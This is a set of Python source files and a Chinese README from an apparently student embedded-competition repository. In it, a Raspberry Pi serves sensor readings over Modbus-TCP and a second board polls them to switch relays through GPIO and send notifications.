"blob_id": "f2809db89619c4e06cdc51b487a40f4801d41170", "content_id": "6512ba9f8f5e9d6c47dcac8bb9a02859aa507c02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1760, "license_type": "no_license", "max_line_length": 81, "num_lines": 65, "path": "/lx2k/main.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import time\n\nimport modbus_tk\nimport modbus_tk.hooks as hooks\nimport modbus_tk.defines as cst\nimport modbus_tk.modbus as modbus\nimport modbus_tk.modbus_tcp as modbus_tcp\nimport logging\n\nfrom gpio import *\nfrom serverChan import *\n\nlogger = modbus_tk.utils.create_logger(\"console\", level=logging.DEBUG)\n\n\ndef on_after_recv(data):\n master, bytes_data = data\n# logger.info(bytes_data)\n\n\nhooks.install_hook('modbus.Master.after_recv', on_after_recv)\n\n\ndef on_before_connect(args):\n master = args[0]\n# logger.debug(\"on_before_connect {0} {1}\".format(master._host, master._port))\n\n\nhooks.install_hook(\"modbus_tcp.TcpMaster.before_connect\", on_before_connect)\n\n\ndef on_after_recv(args):\n response = args[1]\n# logger.debug(\"on_after_recv {0} bytes received\".format(len(response)))\n\n\nhooks.install_hook(\"modbus_tcp.TcpMaster.after_recv\", on_after_recv)\n\nmaster = modbus_tcp.TcpMaster(host=\"192.168.0.108\")\nmaster.set_timeout(5.0)\n#logger.info(\"connected\")\nwhile True:\n temp = master.execute(1, cst.READ_INPUT_REGISTERS, 185, 1)[0] / 10\n humi = master.execute(1, cst.READ_INPUT_REGISTERS, 186, 1)[0] / 10\n light = master.execute(1, cst.READ_INPUT_REGISTERS, 187, 1)[0]\n air = master.execute(1, cst.READ_INPUT_REGISTERS, 188, 1)[0]\n light_state = False\n if light < 700:\n set_gpio(60)\n set_gpio(61)\n set_gpio(62)\n set_gpio(63)\n if light_state:\n sendMsg(\"light is off\")\n light_state = True\n else:\n reset_gpio(60)\n reset_gpio(61)\n reset_gpio(62)\n reset_gpio(63)\n if not light_state:\n sendMsg(\"light is off\")\n light_state = False\n print(f\"temperature:{temp}\\thumity:{humi}\\tlight:{light}\\tair:{air}\")\n time.sleep(1)\n" }, { "alpha_fraction": 0.4916888177394867, "alphanum_fraction": 0.5821143388748169, "avg_line_length": 28.213592529296875, "blob_id": "9d999ba84dea56770006325f146ccd7e0af7b471", "content_id": "668425764d74a6d69977faa9281aa797128221ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3354, "license_type": "no_license", "max_line_length": 83, "num_lines": 103, "path": "/rpi/main.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import modbus_tk\nimport modbus_tk.defines as 
cst\nimport modbus_tk.modbus as modbus\nimport modbus_tk.modbus_tcp as modbus_tcp\nimport logging\nimport time\nimport smbus\nimport RPi.GPIO as GPIO\nimport max30102\n\n# 配置树莓派的GPIO 空污传感器接在BCM24/23上\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(23, GPIO.IN)\nGPIO.setup(24, GPIO.IN)\n\n# 新建一个i2c对象\nbus = smbus.SMBus(1)\n\n# 创建一个MODBUS-TCP对象并开启服务\nlogger = modbus_tk.utils.create_logger(name=\"console\", record_format=\"%(message)s\")\nserver = modbus_tcp.TcpServer(address=\"192.168.0.108\", port=502)\nserver.start()\n\n# 添加一个slaver,给这个slaver添加温度、湿度、光照、空气质量的block(Niagara中称为Point)\nslaver = server.add_slave(1)\nslaver.add_block('Temperature', cst.READ_INPUT_REGISTERS, 185, 1)\nslaver.add_block('Humidity', cst.READ_INPUT_REGISTERS, 186, 1)\nslaver.add_block('Light', cst.READ_INPUT_REGISTERS, 187, 1)\nslaver.add_block('Air', cst.READ_INPUT_REGISTERS, 188, 1)\n\n# 开启光照传感器\nbus.write_i2c_block_data(0x39, 0x80, [0x03])\n\nwhile True:\n # 读取计算SHT30传感器的温湿度\n bus.write_i2c_block_data(0x44, 0x2C, [0x06])\n time.sleep(0.5)\n data = bus.read_i2c_block_data(0x44, 0x00, 6)\n # print(data)\n temp = data[0] * 256 + data[1]\n temp = -45 + (175 * temp / 65535.0)\n temp = int(temp * 10)\n humi = 100 * (data[3] * 256 + data[4]) / 65535.0\n humi = int(humi * 10)\n # 更新温度和湿度寄存器的值\n slaver.set_values('Temperature', 185, temp)\n slaver.set_values(\"Humidity\", 186, humi)\n # print(f\"temperature:{temp / 10}\")\n # print(f\"humidity:{humi / 10}\")\n\n # 读取光照传感器的值\n data0_low = bus.read_i2c_block_data(0x39, 0x8c, 1)\n data0_high = bus.read_i2c_block_data(0x39, 0x8d, 1)\n data1_low = bus.read_i2c_block_data(0x39, 0x8e, 1)\n data1_high = bus.read_i2c_block_data(0x39, 0x8f, 1)\n data0 = data0_high[0] * 256 + data0_low[0]\n data1 = data1_high[0] * 256 + data1_low[0]\n if data0 == 0:\n light = 0\n else:\n div = float(data1) / float(data0)\n if 0 < div <= 0.5:\n light = (0.304 * data0 - 0.062 * data0 * (div ** 1.4))\n elif div <= 0.61:\n light = (0.0224 * data0 - 0.031 * data1)\n elif div <= 0.8:\n light = (0.0128 * data0 - 0.0153 * data1)\n elif div <= 1.3:\n light = (0.00146 * data0 - 0.00112 * data1)\n else:\n light = 0\n # print(f\"light:{light}\")\n # 更新光照寄存器的值\n slaver.set_values('Light', 187, int(light))\n\n # 读取空污模组的值\n # 空污传感器A脚接在BCM24上,B脚接在BCM23上\n # 空污传感器输出信号定义:\n # 污染等级 A信号输出 B信号输出 污染状态标识\n # 0 Low Low 优\n # 1 Low High 良\n # 2 High Low 中\n # 3 High High 差\n\n A = GPIO.input(24)\n B = GPIO.input(23)\n if A == 0 and B == 0:\n air = 0\n elif A == 0 and B == 1:\n air = 1\n elif A == 1 and B == 0:\n air = 2\n else:\n air = 3\n # print(air)\n # 更新空气质量传感器的值\n slaver.set_values('Air', 188, air)\n\n# m = max30102.MAX30102()\n# red, ir = m.read_sequential()\n# print(red,ir)\n\n # time.sleep(2)" }, { "alpha_fraction": 0.60546875, "alphanum_fraction": 0.61328125, "avg_line_length": 22.813953399658203, "blob_id": "763e43391de31896a36117bccb7fa96ae370e4af", "content_id": "dc527995785921f4dd6e624d771ca426fc437712", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1048, "license_type": "no_license", "max_line_length": 76, "num_lines": 43, "path": "/lx2k/ai.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import requests\nimport json\nimport base64\n\n# 别问,问就砍feature了没写完\n\napi = 'https://aip.baidubce.com/rpc/2.0/ai_custom/v1/video_cls/diedaojiance'\napp_id = ''\napi_key = ''\nsecret_key = ''\n\n\n# client_id为api key client_secret为secret key\ndef get_access_token(client_id, client_secret):\n url = 'https://aip.baidubce.com/oauth/2.0/token'\n data = {\n 
'grant_type': 'client_credentials',\n 'client_id': api_key,\n 'client_secret': client_secret\n }\n res = requests.post(url=url, data=data)\n print(res.json()['refresh_token'])\n return res.json()['refresh_token']\n\n\ndef send_video(access_token, video):\n url = api\n headers = {\n 'Content-Type': 'application/json',\n 'access_token': access_token\n }\n data = {\n 'video': video,\n 'top_num': 6\n }\n res = requests.post(url=url, headers=headers, data=data)\n print(res.json())\n\n\nif __name__ == '__main__':\n video = ''\n access_token = get_access_token(api_key, secret_key)\n send_video(access_token, video)\n" }, { "alpha_fraction": 0.4808878004550934, "alphanum_fraction": 0.49568432569503784, "avg_line_length": 27.456140518188477, "blob_id": "e4c560286fbbe2afbfbd22ddba2052bd4b6127cd", "content_id": "36abf651ed171da4daf71ce762f385aff78d8f97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1622, "license_type": "no_license", "max_line_length": 61, "num_lines": 57, "path": "/lx2k/gpio.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import time\nimport os\n\n\ndef set_gpio(gpiox):\n gpio_dir = f'/sys/class/gpio/gpio{gpiox}'\n if os.path.isfile(f'{gpio_dir}/value'):\n with open(f'{gpio_dir}/direction') as state:\n if state.read(2) == 'in':\n is_state_out = False\n else:\n is_state_out = True\n if not is_state_out:\n with open(f'{gpio_dir}/direction', 'w') as state:\n state.write('out')\n with open(f'{gpio_dir}/value', 'w') as gpio:\n gpio.write('1')\n else:\n with open(f'/sys/class/gpio/export', 'w') as export:\n export.write(f'{gpiox}')\n set_gpio(gpiox)\n\n\ndef reset_gpio(gpiox):\n gpio_dir = f'/sys/class/gpio/gpio{gpiox}'\n if os.path.isfile(f'{gpio_dir}/value'):\n with open(f'{gpio_dir}/direction') as state:\n if state.read() == 'in':\n is_state_out = False\n else:\n is_state_out = True\n if not is_state_out:\n with open(f'{gpio_dir}/direction', 'w') as state:\n state.write('out')\n with open(f'{gpio_dir}/value', 'w') as gpio:\n gpio.write('0')\n else:\n with open(f'/sys/class/gpio/export', 'w') as export:\n export.write(f'{gpiox}')\n set_gpio(gpiox)\n\n\nif __name__ == '__main__':\n while True:\n set_gpio(60)\n time.sleep(2)\n set_gpio(61)\n time.sleep(2)\n set_gpio(62)\n time.sleep(2)\n set_gpio(63)\n time.sleep(2)\n reset_gpio(60)\n reset_gpio(61)\n reset_gpio(62)\n reset_gpio(63)\n time.sleep(5)\n" }, { "alpha_fraction": 0.7816901206970215, "alphanum_fraction": 0.8380281925201416, "avg_line_length": 14.666666984558105, "blob_id": "df730fbd519850c05a2f782bec9de3a380f97958", "content_id": "0008b1f98bd8305db0a7657c58e044fdba3cd021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 332, "license_type": "no_license", "max_line_length": 77, "num_lines": 9, "path": "/README.md", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "# 2021-emb\n\n本程序为2021年嵌入式竞赛龙芯赛道代码,旨在打造一个简易的本地的智能家居系统\n\n\n\n# 实现功能\n\nrpi读取传感器数据,通过modbus-tcp与龙芯派交流数据,龙芯派根据数据控制IO口进而控制继电器和用电器,以及给微信推送信息(使用server酱)。\n\n" } ]
6
Ureimu/small-tools
https://github.com/Ureimu/small-tools
7d4eb222685c9a14334eede98601c4851041c7b5
7d33946d327a10f072be6c255eaebde6fa77c688
8b48eda8517159f3506c5cb6171e07c166830719
refs/heads/master
2022-09-19T08:47:42.170751
2020-05-31T10:42:04
2020-05-31T10:42:04
268,242,973
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5588235259056091, "alphanum_fraction": 0.5670955777168274, "avg_line_length": 24.904762268066406, "blob_id": "88960ffb4237794e82f657a2b512430d56ee2be6", "content_id": "86d15590285401c6110bdf81965ff95fa671b8bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1220, "license_type": "no_license", "max_line_length": 71, "num_lines": 42, "path": "/get_csdn_code.py", "repo_name": "Ureimu/small-tools", "src_encoding": "UTF-8", "text": "import re\n\n\"\"\"\n将csdn的代码块的源代码输入,可以得到代码块的内容.\n事实上,基本所有的网站都可以用这个工具来提取代码.\n\"\"\"\nregex = r\"([0-9])|(>(.*?)<)\"\ntext=\"\"\ntest_str=input()\nmatches = re.finditer(regex, test_str, re.MULTILINE)\n\n#第一次匹配,去除html标签\nfor matchNum, match in enumerate(matches, start=1):\n for groupNum in range(0, len(match.groups())):\n groupNum = groupNum + 1\n if groupNum==3 and type(match.group(groupNum)) is str:\n text+=match.group(groupNum)\n try:\n if groupNum==1:\n int(match.group(groupNum))\n text+='\\n'\n except:\n pass\n\n#第二次匹配,转换一些html的保留字\ndef re_html_label(match_h):\n if match_h.group('left_angle_bracket')=='&lt;':\n return \"<\"\n elif match_h.group('right_angle_bracket')=='&gt;':\n return '>'\n elif match_h.group('and')=='&amp;':\n return '&'\n elif match_h.group('space')=='&nbsp;':\n return ' '\n else:\n pass\n \nregex2 = r\"(?P<left_angle_bracket>&lt;)|(?P<right_angle_bracket>&gt;)|\\\n (?P<and>&amp;)|(?P<space>&nbsp;)\"\ntext=re.sub(regex2,re_html_label,text)\n\nprint(text)\n" } ]
1
Anthonysokolov/midi-data
https://github.com/Anthonysokolov/midi-data
1258f129255bcd1e254c6a9882e1dae15c5fe321
889413b4dac6ec8f23026fb0562abf560cb8865d
b0312b5d6dfe655a5c68a0e8676c65405ff12c29
refs/heads/master
2022-12-11T02:05:33.517110
2020-09-03T00:47:39
2020-09-03T00:47:39
291,347,118
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5491480827331543, "alphanum_fraction": 0.5766710638999939, "avg_line_length": 17.609756469726562, "blob_id": "a0a41a2b1b91de408d524e50e9bdba826deee71b", "content_id": "75f22e1bd6eeabe485e0a97999b36387cbfb50f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 763, "license_type": "no_license", "max_line_length": 52, "num_lines": 41, "path": "/songs/song2.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "'''\nProgram to send midi data from python to a midi port\nMade to use with hardware synths!\n'''\n\nimport mido\nimport time\nimport sys\nfrom random import randint\n\nsys.path.append(\"..\")\n\nimport patterns as p\n\n# Connect port, change port name as needed\nport = \"minilogue SOUND\"\noutport = mido.open_output(port)\n\n\n\nfor loop in range(3):\n # generate messages\n #msg = mido.Message(\"note_on\",note=57 + 2*loop)\n size = 6\n messages = p.randAsc(size,start=57+loop,vel=3)\n\n for y in range(7,11):\n i = 0.01\n j = 0.001\n\n for x in range(y):\n msg = messages[x % size]\n outport.send(msg)\n time.sleep(i+j)\n\n temp = i\n i = i+j\n j = temp\n\n time.sleep(1/y)\n time.sleep(.35)\n" }, { "alpha_fraction": 0.5779816508293152, "alphanum_fraction": 0.5963302850723267, "avg_line_length": 20.799999237060547, "blob_id": "5b9306892e069fd04eb78605bfdc97863f80baba", "content_id": "ec284895e965a9ab4c372edc94eade568e702693", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 545, "license_type": "no_license", "max_line_length": 66, "num_lines": 25, "path": "/intervals.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "import mido\n\ndef playAtIntervals(messages, times, outport):\n '''\n function to play messages at given intervals\n messages and times must be arrays of equal length\n '''\n for msg,t in zip(messages,times):\n outport.send(msg)\n time.sleep(t)\n\ndef getFibonacci(length, t1):\n '''\n returns array of intervals generated by the fibonacci sequence\n starts at t1\n '''\n out = []\n t2 = t1\n for i in range(length):\n out.append(t1)\n temp = t1\n t1 = t1 + t2\n t2 = temp\n\n return out\n" }, { "alpha_fraction": 0.6051948070526123, "alphanum_fraction": 0.63246750831604, "avg_line_length": 20.38888931274414, "blob_id": "b988c7ab3276eb0a8f93cb0246af2d8118f0f84e", "content_id": "5cd331ab1c43fe1760de37b335cf62e35b0d4e9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 770, "license_type": "no_license", "max_line_length": 52, "num_lines": 36, "path": "/songs/song1.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "'''\nProgram to send midi data from python to a midi port\nMade to use with hardware synths!\n'''\n\nimport mido\nimport time\nimport sys\nfrom random import randint\n\nsys.path.append(\"..\")\n\nimport patterns as p\n\n# Connect port, change port name as needed\nport = \"minilogue SOUND\"\noutport = mido.open_output(port)\n\nwhile True:\n # generate messages\n messages = p.ascending(5, start=67,step=3)\n messages.append(None)\n messages += p.ascending(5, start = 64, step=3)\n messages.append(None)\n messages += p.randWalk(7, start=71, vel=3)\n\n # send messages to output\n for msg in messages:\n if msg:\n outport.send(msg)\n amt = 0.05 * randint(4,8)\n time.sleep(amt)\n else:\n time.sleep(0.3)\n\n time.sleep(0.5)\n" }, { "alpha_fraction": 0.7844827771186829, "alphanum_fraction": 0.7931034564971924, 
"avg_line_length": 57, "blob_id": "d3115ec86e4adb6571433579a8ee9c18568efb08", "content_id": "2d7712d0590a8c9fbd0dd421b721b83524c13f79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 91, "num_lines": 2, "path": "/scales.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "# todo implement scales\n3# map midi notes to c major scale and implement conversion from c major to any other scale\n" }, { "alpha_fraction": 0.800632894039154, "alphanum_fraction": 0.800632894039154, "avg_line_length": 30.600000381469727, "blob_id": "0c2852cfda4a34a2fd7e46fe7e5b14978581b367", "content_id": "8bf6bfa550658a2f58a43ed23251488eab3549f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 316, "license_type": "no_license", "max_line_length": 78, "num_lines": 10, "path": "/readme.md", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "# Sending Midi data to output ports with python!\nThis repo contains scripts designed to send midi signals from code to hardware\n\nDifferent modules are used to generate different kinds of patterns (still wip)\n\nOutput can be sent to any midi port connected to the machine\n\nSend a PR to contribute!\n\nDependencies: Mido\n" }, { "alpha_fraction": 0.5749769806861877, "alphanum_fraction": 0.6007359623908997, "avg_line_length": 26.871795654296875, "blob_id": "404189c2c3d01f7b04d2f5f67c9158a48eefe13d", "content_id": "5ade8c1a3a624a04f66c0423c8dd7a2a0d576788", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1087, "license_type": "no_license", "max_line_length": 78, "num_lines": 39, "path": "/patterns.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "import mido\nfrom random import randint\n\ndef ascending(num=7, start=0, step=1):\n return [mido.Message(\"note_on\", note = start + i*step)for i in range(num)]\n\ndef descending(num=7, start=127, step=1):\n return [mido.Message(\"note_on\", note = start - i*step)for i in range(num)]\n\ndef randAsc(num=7, start=0, vel=8):\n out = []\n current = start\n for i in range(num):\n out.append(mido.Message(\"note_on\", note = current))\n current = current + randint(0,vel)\n\n return out\n\ndef randDesc(num=7, start=127):\n out = []\n current = start\n for i in range(num):\n out.append(mido.Message(\"note_on\", note = current))\n current = current - randint(1,9)\n\n return out\n\ndef randWalk(num=7, start=64, lower=0, upper=127, vel=7):\n out = []\n current = start\n for i in range(num):\n out.append(mido.Message(\"note_on\", note = current))\n current = current + randint(-vel,vel)\n if current < lower:\n current = lower + randint(0,vel)\n if current > upper:\n current = upper - randint(0,vel)\n\n return out\n" }, { "alpha_fraction": 0.6015151739120483, "alphanum_fraction": 0.6348484754562378, "avg_line_length": 24.384614944458008, "blob_id": "f954db7a5550979e29f2187d42e85b8e5a24d62b", "content_id": "08db73db632e1e1fa09759e5959697e723e50a3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 660, "license_type": "no_license", "max_line_length": 58, "num_lines": 26, "path": "/main.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "'''\nProgram to send midi data from python to a midi port\nMade to use with hardware synths!\n'''\n\nimport mido\nimport 
time\n\nimport patterns\n\n# Connect port, change port name as needed\nport = \"minilogue SOUND\"\noutport = mido.open_output(port)\n\nfor j in range(2):\n for i in range(2):\n # generate messages\n #messages = patterns.descending(5+i,127 - 4*i,4)\n #messages += patterns.ascending(3, 99-4*i, 4)\n messages = patterns.descending(start = 90, step=4)\n messages = patterns.randWalk(12,start = 72, vel=5)\n\n # send messages to output\n for msg in messages:\n outport.send(msg)\n time.sleep(.2)\n" } ]
7
agilebeat/pipeline-2
https://github.com/agilebeat/pipeline-2
3b806f7932fdc2e7adf325ff26024ba2b56e5a50
f5a786fd214e2ecf0e2ba66e5720b3d588513277
1fa6c117f8ed338fc1e8e10b957f949b7628a5de
refs/heads/master
2022-07-26T16:37:10.806659
2020-04-06T15:00:18
2020-04-06T15:00:18
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.601570188999176, "alphanum_fraction": 0.6231599450111389, "avg_line_length": 31.168420791625977, "blob_id": "55264b7579d8ba505ab21d6d131c76c7d2f6d708", "content_id": "beccdaaebdb12fad52526ac66e91c771b3464af0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3057, "license_type": "no_license", "max_line_length": 105, "num_lines": 95, "path": "/example-Color-based/COLOR_2_model.py", "repo_name": "agilebeat/pipeline-2", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 10:42:22 2020\n\n@author: swilson\n\"\"\"\nimport json\nimport boto3\nimport numpy as np\nimport base64\nimport io\nimport cv2\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport os\nimport collections\n\n\n\ndef dominant_color_set(rgb_list, n_most = 1, rgb_buffers=(5, 5, 5)):\n \"\"\"\n the functions return a list of dominant color (R,G,B) that charcterizes the map feature of interest\n < Arguments >\n * rgb_list: (r,b,g) list of n-most frequent colors (output of function \"hex_to_rgb()\")\n * n_most: the number of colors that would characterize the map feature of interest\n * rgb_buffers: R,G,B color buffer for color intervals considered featured color \n \"\"\"\n RGB_sets = [rgb for rgb, freq, prob in rgb_list[:n_most]]\n r_buffer, g_buffer, b_buffer = rgb_buffers \n\n feature_colors = []\n for rgb in RGB_sets:\n R, G, B = rgb\n R_max, G_max, B_max = (R + r_buffer, G + g_buffer, B + b_buffer)\n R_min, G_min, B_min = (R - r_buffer, G - g_buffer, B - b_buffer)\n colors = ((R_min, G_min, B_min), (R_max, G_max, B_max))\n feature_colors.append(colors) \n return feature_colors\n\n\ndef pic_val_count(img_name):\n \"\"\"\n the function counts colors (R,G,B) of input image, and returns with frequency\n < Arguments >\n * img_nam: image file name, e.g.) 'image.png'\n \"\"\"\n pic = cv2.imread(img_name)\n pic = cv2.cvtColor(pic, cv2.COLOR_BGR2RGB)\n\n reshaped_pic = np.reshape(pic, (pic.shape[0]*pic.shape[1], 3))\n reshaped_pic = reshaped_pic.tolist()\n reshaped_pic = [tuple(pixel) for pixel in reshaped_pic]\n \n col_count = []\n for i in set(reshaped_pic):\n (col_val, num_pic) = i, reshaped_pic.count(i)\n col_count.append((col_val, num_pic)) \n return col_count\n\n\n\ndef classify_feature_image(input_img, feature_colors, pix_cutoff=50):\n \"\"\"\n the function detects color of interest from input image\n < Arguments >\n * input_img: image file name, e.g.) 
'image.png'\n * feature_colors: a list of featured color obtained from \"dominant_color_set()\"\n * pix_cutoff: the threshold number of featured pixel to be considered 'positive' image\n \"\"\"\n result = 'negative'\n for pic_val, num in pic_val_count(input_img):\n for min_rgb, max_rgb in feature_colors:\n if (((min_rgb[0] <= pic_val[0] <= max_rgb[0])\n &(min_rgb[1] <= pic_val[1] <= max_rgb[1])\n &(min_rgb[2] <= pic_val[2] <= max_rgb[2])) & (num > pix_cutoff)):\n result = \"positive\"\n return result\n\n\n\n\n###########################\n# Test\n########################### \ndir_pos = './landuse_construction/color_dist' \nHEXs_Freq = color_dist(dir_pos)\nrgb_list = hex_to_rgb\nfeature_colors = dominant_color_set(rgb_list)\n\n# positive\nclassify_feature_image('./landuse_construction/TEST/construction/19_432033_198647.png', feature_colors)\n# negative\nclassify_feature_image('./landuse_construction/TEST/not_construction/15_26878_12478.png', feature_colors)\n\n" }, { "alpha_fraction": 0.576076090335846, "alphanum_fraction": 0.5960960984230042, "avg_line_length": 32.25, "blob_id": "0135ff4b036d5a526ed74411f2c6a797f74c6325", "content_id": "ebe8e3320cb05e02f12ad0fa0927a78dddd5d742", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1998, "license_type": "no_license", "max_line_length": 101, "num_lines": 60, "path": "/example-Color-based/COLOR_1_dominant_colors.py", "repo_name": "agilebeat/pipeline-2", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 10:30:26 2020\n\n@author: swilson\n\"\"\"\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport os\nimport collections\n\n\ndef color_dist(dir_pos, descending=True):\n \"\"\"\n the function returns list of tuples (hex_code, freq) in descending (default) order of frequency \n < Arguments > \n * dir_pos: path of directory where postivie images are \n \"\"\"\n tiles = [os.path.join((dir_pos), file) for file in os.listdir(dir_pos)]\n \n color_vals = [] \n for img in tiles:\n pic = cv2.imread(img)\n pic = cv2.cvtColor(pic, cv2.COLOR_BGR2RGB)\n \n reshaped_pic = np.reshape(pic, (pic.shape[0]*pic.shape[1], 3))\n reshaped_pic = reshaped_pic.tolist()\n \n RGBs = [(pixel[0], pixel[1], pixel[2]) for pixel in reshaped_pic]\n HEXs = ['%02x%02x%02x' % rgb for rgb in RGBs]\n color_vals = color_vals + list(set(HEXs))\n \n total_n_images = len(tiles)\n Freq = collections.Counter(color_vals)\n Freq = {k: v for k, v in sorted(Freq.items(), \n reverse=descending, key=lambda item: item[1])}\n HEXs_Freq = list(Freq.items()) \n HEXs_Freq = [(hex_code, freq, round(freq/total_n_images, 3) ) \n for hex_code, freq in HEXs_Freq]\n return HEXs_Freq \n\n\ndef hex_to_rgb(HEXs_Freq, n_most_rgb=10):\n \"\"\"\n the function converts HEXs to RGB code for n-most frequent color used in positive data\n < Arguments >\n * HEXs_Freq: the list of HEXs color codes collected from the positive data\n * n_most_rgb: limites output. Returns n colors only (descending order)\n \"\"\"\n rgb_list = [] \n for hex_code, freq, pct in HEXs_Freq[:n_most_rgb]:\n value = hex_code.lstrip('#')\n lv = len(value)\n rgb = tuple(int(value[i:i+lv//3], 16) for i in range(0, lv, lv//3))\n rgb_list = rgb_list + [(rgb, freq, pct)]\n return rgb_list " } ]
2
xuanhien091/python-chromedriver-binary
https://github.com/xuanhien091/python-chromedriver-binary
aa62788dc253836fbf551d6ccce03779b9cb5397
8deab624b3c712b3d8fd21f4d3a925b4b024c3de
b32d599b00fb733f5a328aafb97dbc1f6b82e2c2
refs/heads/master
2023-06-02T09:15:02.159060
2021-06-12T04:03:57
2021-06-12T04:03:57
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6384401321411133, "alphanum_fraction": 0.6462395787239075, "avg_line_length": 41.235294342041016, "blob_id": "d875f6f7b712f2b899cc9b5800d431a54ab102a8", "content_id": "64dbe9bbfafd30df44585ebfdc526f874c9f592a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3590, "license_type": "permissive", "max_line_length": 123, "num_lines": 85, "path": "/setup.py", "repo_name": "xuanhien091/python-chromedriver-binary", "src_encoding": "UTF-8", "text": "from setuptools import setup\nfrom setuptools.command.build_py import build_py\nfrom chromedriver_binary.utils import get_chromedriver_filename, get_chromedriver_url, find_binary_in_path, check_version\n\nimport os\nimport zipfile\n\ntry:\n from io import BytesIO\n from urllib.request import urlopen, URLError\nexcept ImportError:\n from StringIO import StringIO as BytesIO\n from urllib2 import urlopen, URLError\n\n__author__ = 'Daniel Kaiser <[email protected]>'\n\n\nwith open('README.md') as readme_file:\n long_description = readme_file.read()\n\n\nclass DownloadChromedriver(build_py):\n def run(self):\n \"\"\"\n Downloads, unzips and installs chromedriver.\n If a chromedriver binary is found in PATH it will be copied, otherwise downloaded.\n \"\"\"\n chromedriver_version='92.0.4515.43'\n chromedriver_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'chromedriver_binary')\n chromedriver_filename = find_binary_in_path(get_chromedriver_filename())\n if chromedriver_filename and check_version(chromedriver_filename, chromedriver_version):\n print(\"\\nChromedriver already installed at {}...\\n\".format(chromedriver_filename))\n new_filename = os.path.join(chromedriver_dir, get_chromedriver_filename())\n self.copy_file(chromedriver_filename, new_filename)\n else:\n chromedriver_bin = get_chromedriver_filename()\n chromedriver_filename = os.path.join(chromedriver_dir, chromedriver_bin)\n if not os.path.isfile(chromedriver_filename) or not check_version(chromedriver_filename, chromedriver_version):\n print(\"\\nDownloading Chromedriver...\\n\")\n if not os.path.isdir(chromedriver_dir):\n os.mkdir(chromedriver_dir)\n url = get_chromedriver_url(version=chromedriver_version)\n try:\n response = urlopen(url)\n if response.getcode() != 200:\n raise URLError('Not Found')\n except URLError:\n raise RuntimeError('Failed to download chromedriver archive: {}'.format(url))\n archive = BytesIO(response.read())\n with zipfile.ZipFile(archive) as zip_file:\n zip_file.extract(chromedriver_bin, chromedriver_dir)\n else:\n print(\"\\nChromedriver already installed at {}...\\n\".format(chromedriver_filename))\n if not os.access(chromedriver_filename, os.X_OK):\n os.chmod(chromedriver_filename, 0o744)\n build_py.run(self)\n\n\nsetup(\n name=\"chromedriver-binary\",\n version=\"92.0.4515.43.0\",\n author=\"Daniel Kaiser\",\n author_email=\"[email protected]\",\n description=\"Installer for chromedriver.\",\n license=\"MIT\",\n keywords=\"chromedriver chrome browser selenium splinter\",\n url=\"https://github.com/danielkaiser/python-chromedriver-binary\",\n packages=['chromedriver_binary'],\n package_data={\n 'chromedriver_binary': ['chromedriver*']\n },\n entry_points={\n 'console_scripts': ['chromedriver-path=chromedriver_binary.utils:print_chromedriver_path'],\n },\n long_description_content_type='text/markdown',\n long_description=long_description,\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Topic :: Software Development :: Testing\",\n \"Topic :: 
